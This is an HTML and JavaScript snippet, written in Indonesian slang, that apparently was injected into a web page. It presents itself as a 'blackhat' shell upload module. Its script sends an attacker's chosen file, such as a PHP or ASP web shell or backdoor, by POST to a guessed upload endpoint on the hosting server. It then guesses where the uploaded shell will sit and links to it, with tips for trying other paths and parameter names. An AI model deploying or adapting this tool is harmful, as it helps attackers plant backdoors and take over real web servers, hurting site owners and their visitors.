|
|
well |
<style>
/* Basic styling biar form-nya gak amburadul dan gampang dibaca */
#hackersec-upload-container {
font-family: 'Segoe UI', sans-serif;
background-color: #222;
color: #0f0;
border: 2px solid #0f0;
padding: 20px;
margin: 20px 0;
border-radius: 8px;
box-shadow: 0 0 15px rgba(0, 255, 0, 0.5);
}
#hackersec-upload-container h3 {
color: #0ff;
margin-top: 0;
border-bottom: 1px solid #0f0;
padding-bottom: 10px;
}
#hackersec-upload-container p {
margin-bottom: 10px;
}
#hackersec-upload-form input[type="file"],
#hackersec-upload-form input[type="text"] {
background-color: #333;
color: #0f0;
border: 1px solid #0f0;
padding: 10px;
margin-bottom: 10px;
display: block;
width: calc(100% - 22px); /* Adjust for padding and border */
box-sizing: border-box;
border-radius: 4px;
}
#hackersec-upload-form button {
background-color: #008000; /* Dark green */
color: white;
padding: 12px 20px;
border: none;
cursor: pointer;
width: 100%;
border-radius: 4px;
font-weight: bold;
transition: background-color 0.3s ease;
}
#hackersec-upload-form button:hover {
background-color: #006400; /* Even darker green */
}
#hackersec-upload-result {
margin-top: 15px;
padding: 15px;
border: 1px dashed #0f0;
background-color: #111;
word-wrap: break-word;
border-radius: 4px;
color: #eee;
}
#hackersec-upload-result a {
color: #0ff;
text-decoration: none;
}
#hackersec-upload-result a:hover {
text-decoration: underline;
}
#hackersec-upload-result p {
margin-bottom: 5px;
}
#hackersec-upload-result .success { color: #0f0; }
#hackersec-upload-result .error { color: #f00; }
#hackersec-upload-result .info { color: #ff0; }
</style>
<div id="hackersec-upload-container">
<h3><span style="color: red;">[BLACKHAT MODE ACTIVE]</span> HackerSec.ID Shell Upload Module v2026</h3>
<p>Yo, bro! Drop your shell here. Kita coba jebol server ini. Ingat, ini skill Blackhat buat penetrasi, gunakan dengan tanggung jawab atau jadikan ajang pamer skill!</p>
<form id="hackersec-upload-form" enctype="multipart/form-data">
<label for="shellFile" style="display: block; margin-bottom: 5px; color: #0f0;">Pilih Shell Lo (misal: `shell.php`, `backdoor.asp`):</label>
<input type="file" name="shellFile" id="shellFile" required>
<label for="uploadPath" style="display: block; margin-bottom: 5px; color: #0f0;">Tebakan Endpoint/Path Upload di Server Target:</label>
<input type="text" name="uploadPath" id="uploadPath" value="/upload.php" placeholder="Misal: /upload.php, /api/file_upload, /images/upload.aspx">
<p style="font-size: 0.8em; color: #ff0;">**PENTING**: Ganti <b>`uploadPath`</b> ini dengan endpoint yang lo tebak atau sudah lo riset ada di server target. Ini kunci suksesnya!</p>
<label for="paramName" style="display: block; margin-bottom: 5px; color: #0f0;">Nama Parameter File di Server (e.g., 'file', 'image', 'upload'):</label>
<input type="text" name="paramName" id="paramName" value="file" placeholder="Misal: file, image, upload_file">
<p style="font-size: 0.8em; color: #ff0;">**PENTING**: Ini nama variabel yang server target harapkan untuk file upload-nya. Defaultnya 'file', tapi bisa jadi beda!</p>
<button type="submit">Sikat! Upload Shell Sekarang!</button>
</form>
<div id="hackersec-upload-result">
<p>Result akan muncul di sini setelah mencoba upload...</p>
</div>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
const uploadForm = document.getElementById('hackersec-upload-form');
const fileInput = document.getElementById('shellFile');
const uploadPathInput = document.getElementById('uploadPath');
const paramNameInput = document.getElementById('paramName'); // New input for parameter name
const resultDiv = document.getElementById('hackersec-upload-result');
uploadForm.addEventListener('submit', async function(e) {
e.preventDefault(); // Stop default form submission, kita handle pake JS
const file = fileInput.files[0];
if (!file) {
resultDiv.innerHTML = '<p class="error">No file selected, bro! Pilih dulu shell-nya.</p>';
return;
}
const formData = new FormData();
const paramName = paramNameInput.value || 'file'; // Get parameter name, default to 'file'
formData.append(paramName, file); // Masukin file ke FormData dengan nama parameter yang bisa disesuaikan
let targetUploadUrl = uploadPathInput.value;
// Pastikan URL-nya path relatif ke root
if (!targetUploadUrl.startsWith('/')) {
targetUploadUrl = '/' + targetUploadUrl;
}
resultDiv.innerHTML = '<p class="info">Uploading... Sabar ya, lagi kerja keras menyusup!</p>';
try {
// Kirim request POST ke server target dengan Fetch API (modern JS!)
const response = await fetch(targetUploadUrl, {
method: 'POST',
body: formData,
// Penting: Jangan set Content-Type secara manual untuk FormData. Browser akan otomatis
// mengatur 'multipart/form-data' dengan boundary yang benar.
});
const textResponse = await response.text(); // Ambil respons mentah dari server
if (response.ok) { // Jika status HTTP 200-299, dianggap sukses
// Ini bagian yang tricky: menebak URL shell setelah diupload.
// Ini SANGAT bergantung pada konfigurasi server target.
// Gue akan tebak yang paling umum: di folder yang sama dengan endpoint upload,
// atau di folder /uploads, /files, dll.
let possibleShellUrl = window.location.origin + targetUploadUrl;
// Kalau targetUploadUrl itu handler (misal /upload.php) dan bukan folder,
// kita coba tebak lokasi aslinya.
if (targetUploadUrl.includes('.')) {
const parts = targetUploadUrl.split('/');
parts.pop(); // Hapus nama file handler-nya
const baseDir = parts.join('/');
possibleShellUrl = window.location.origin + baseDir + '/' + file.name;
// Atau, kalau servernya naro di root atau di folder spesifik, misal /uploads/
// possibleShellUrl = window.location.origin + '/uploads/' + file.name;
} else {
// Kalau targetUploadUrl udah kayak folder (misal /api/upload/), coba tambahin nama file
possibleShellUrl = window.location.origin + targetUploadUrl.replace(/\/+$/, '') + '/' + file.name;
}
resultDiv.innerHTML = `
<p class="success">Upload sukses, bro! Status: <b>${response.status} ${response.statusText}</b></p>
<p>Server response: <code>${textResponse}</code></p>
<p class="info">Coba cek shell lo di sini (ini tebakan paling mungkin, mungkin butuh penyesuaian manual!):</p>
<p><a href="${possibleShellUrl}" target="_blank">${possibleShellUrl}</a></p>
<p class="info">Kalau gak tembus atau 404, berarti servernya agak pinter, atau butuh <b>Target Upload Path</b> dan <b>Nama Parameter File</b> yang pas. Riset lagi! Good luck!</p>
`;
} else { // Jika status HTTP bukan 200-299, ada yang salah
resultDiv.innerHTML = `
<p class="error">Upload gagal, boss. Status: <b>${response.status} ${response.statusText}</b></p>
<p>Server response: <code>${textResponse}</code></p>
<p class="error">Mungkin endpoint <b>"${targetUploadUrl}"</b> gak ada, aksesnya diblok, atau <b>Nama Parameter File ("${paramName}")</b> salah. Coba lagi dengan path/nama parameter lain!</p>
`;
}
} catch (error) {
resultDiv.innerHTML = `
<p class="error">Error jaringan atau server gak respons, bro!</p>
<p>Detail: <code>${error.message}</code></p>
<p class="error">Cek lagi koneksi, atau mungkin CORS policy ngeblok (kalau lo coba kirim ke domain lain).</p>
`;
console.error('HackerSec Upload Error:', error);
}
});
});
</script> |
|
|
